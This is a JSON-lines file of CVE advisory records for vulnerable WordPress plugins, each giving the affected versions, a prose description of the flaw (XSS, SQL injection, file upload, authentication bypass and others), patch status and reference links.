{"CVE_ID":"CVE-2024-9108","slug":"wechat-social-login","versionImpact":"1.3.0","description":"The Wechat Social login plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'convert_remoteimage_to_local' function in versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06881386-3c92-426b-948d-58e8a8bee624?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06881386-3c92-426b-948d-58e8a8bee624?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/includes\\\/social\\\/class-xh-social-wp-api.php?rev=2111074#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/includes\\\/social\\\/class-xh-social-wp-api.php?rev=2111074#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10080","slug":"easy-post-types","versionImpact":"1.4.4","description":"The WP Easy Post Types plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post meta in versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1622\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1622\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10111","slug":"miniorange-login-with-eve-online-google-facebook","versionImpact":"6.26.3","description":"The OAuth Single Sign On \u2013 SSO (OAuth Client) plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 6.26.3. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username and the user does not have an already-existing account for the service returning the token.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-login-with-eve-online-google-facebook\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-login-with-eve-online-google-facebook\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd83877-739f-4c21-8179-20de8bbc4936?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd83877-739f-4c21-8179-20de8bbc4936?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11892","slug":"accordion-slider-lite","versionImpact":"1.5.1","description":"The Accordion Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'accordion_slider' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb386ab5-1fb9-4649-99a6-0e3f971a02f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb386ab5-1fb9-4649-99a6-0e3f971a02f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12320","slug":"team-rosters","versionImpact":"4.7","description":"The Team Rosters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in all versions up to, and including, 4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b85505-8cae-4607-a645-5b127f6f37e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b85505-8cae-4607-a645-5b127f6f37e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13578","slug":"wp-bibtex","versionImpact":"3.0.1","description":"The WP-BibTeX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'WpBibTeX' shortcode in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex.php#L180\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex.php#L180\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2011db9d-7237-4843-8c15-63b8fb60de5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2011db9d-7237-4843-8c15-63b8fb60de5d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13922","slug":"product-import-export-for-woo","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.6.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb8f85f-656a-4e5a-a57d-7289da2cd951?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb8f85f-656a-4e5a-a57d-7289da2cd951?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5590","slug":"responsive-owl-carousel","versionImpact":"1.9","description":"The Owl carousel responsive plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel\\\/trunk\\\/query\\\/db_gallery.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel\\\/trunk\\\/query\\\/db_gallery.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-owl-carousel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-owl-carousel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1f230f5-d40c-43b2-82f2-c920dca9707f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1f230f5-d40c-43b2-82f2-c920dca9707f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7835","slug":"ithoughts-advanced-code-editor","versionImpact":"1.2.10","description":"The iThoughts Advanced Code Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.10. This is due to missing or incorrect nonce validation on the 'ithoughts_ace_update_options' AJAX action. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithoughts-advanced-code-editor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithoughts-advanced-code-editor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e99ed03f-ed0a-4f17-b9fe-db0a0e573ed2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e99ed03f-ed0a-4f17-b9fe-db0a0e573ed2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0340","slug":"custom-content-shortcode","versionImpact":"4.0.2","description":"The Custom Content Shortcode WordPress plugin through 4.0.2 does not validate one of its shortcode attribute, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non PHP files and retrieve their content. RCE could also be achieved if the attacker manage to upload a malicious image containing PHP code, and then include it via the affected attribute, on a default WP install, authors could easily achieve that given that they have the upload_file capability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71956598-90aa-4557-947a-c4716674543d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71956598-90aa-4557-947a-c4716674543d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2066","slug":"bulletin-announcements","versionImpact":"3.6.0","description":"The Announcement & Notification Banner \u2013 Bulletin plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the  'bulletinwp_update_bulletin_status', 'bulletinwp_update_bulletin', 'bulletinwp_update_settings', 'bulletinwp_update_status', 'bulletinwp_export_bulletins', and 'bulletinwp_import_bulletins' functions functions in versions up to, and including, 3.6.0. This makes it possible for authenticated attackers with subscriber-level access, and above, to modify the plugin's settings, modify bulletins, create new bulletins, and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d242a466-0611-4e64-8145-29f64100e62b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d242a466-0611-4e64-8145-29f64100e62b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2906036\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2906036\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3105","slug":"sfwd-lms","versionImpact":"4.6.0","description":"The LearnDash LMS plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for attackers with with existing account access at any level, to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2318b3e1-268d-45fa-83bf-c6e88f1b9013?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2318b3e1-268d-45fa-83bf-c6e88f1b9013?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4505","slug":"ldap-ad-staff-employee-directory-search","versionImpact":"1.2.3","description":"The Staff \/ Employee Business Directory for Active Directory plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 1.2.3. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-ad-staff-employee-directory-search\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-ad-staff-employee-directory-search\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"name\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ea40b96-4693-4f98-8e6e-2ed8186cedd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ea40b96-4693-4f98-8e6e-2ed8186cedd8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0975","slug":"wordpress-access-control","versionImpact":"4.0.13","description":"The WordPress Access Control plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.0.13  via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Make Website Members Only\" feature (when unset) and view restricted page and post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-access-control\\\/trunk\\\/wordpress-access-control.php#L289\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-access-control\\\/trunk\\\/wordpress-access-control.php#L289\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1311","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeImages function in all versions up to, and including, 2.4.40. This makes it possible for authenticated attackers, with contributor access or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L254\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L254\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/zip\\\/archiver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/zip\\\/archiver.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3580","slug":"popup4phone","versionImpact":"1.3.2","description":"The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as Editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f401c4-735a-4efb-b81f-ab98c00c526b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f401c4-735a-4efb-b81f-ab98c00c526b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0972","slug":"buddypress-members-only","versionImpact":"3.3.5","description":"The BuddyPress Members Only plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.5 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"All Other Sections On Your Site Will be Opened to Guest\" feature (when unset) and view restricted page and post content.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-members-only\\\/trunk\\\/buddypress-members-only.php#L682\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-members-only\\\/trunk\\\/buddypress-members-only.php#L682\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9106","slug":"wechat-social-login","versionImpact":"1.3.0","description":"The Wechat Social login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.3.0. This is due to insufficient verification on the user being supplied during the social login. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. This is only exploitable if the app secret is not set, so it has a default empty value.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd44471-1a9c-4465-a52a-be64d51e7ea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd44471-1a9c-4465-a52a-be64d51e7ea1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/add-ons\\\/social-qq\\\/class-xh-social-channel-qq.php?rev=2080785#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/add-ons\\\/social-qq\\\/class-xh-social-channel-qq.php?rev=2080785#L284\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10079","slug":"easy-post-types","versionImpact":"1.4.4","description":"The WP Easy Post Types plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.4 via deserialization of untrusted input from the 'text' parameter in the 'ajax_import_content' function. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d038f1a2-4755-417f-965d-508b57c05738?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d038f1a2-4755-417f-965d-508b57c05738?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1318\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11874","slug":"grid-accordion-lite","versionImpact":"1.5.1","description":"The Grid Accordion Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'grid_accordion' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fc20069-5c1d-481a-b0fd-6f29ed6b41ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fc20069-5c1d-481a-b0fd-6f29ed6b41ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13577","slug":"cats-job-listings","versionImpact":"2.0.9","description":"The CATS Job Listings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catsone' shortcode in all versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cats-job-listings\\\/trunk\\\/CATSJobListingUser.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cats-job-listings\\\/trunk\\\/CATSJobListingUser.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c0af593-2674-484a-a6a5-715f6fb488cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c0af593-2674-484a-a6a5-715f6fb488cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
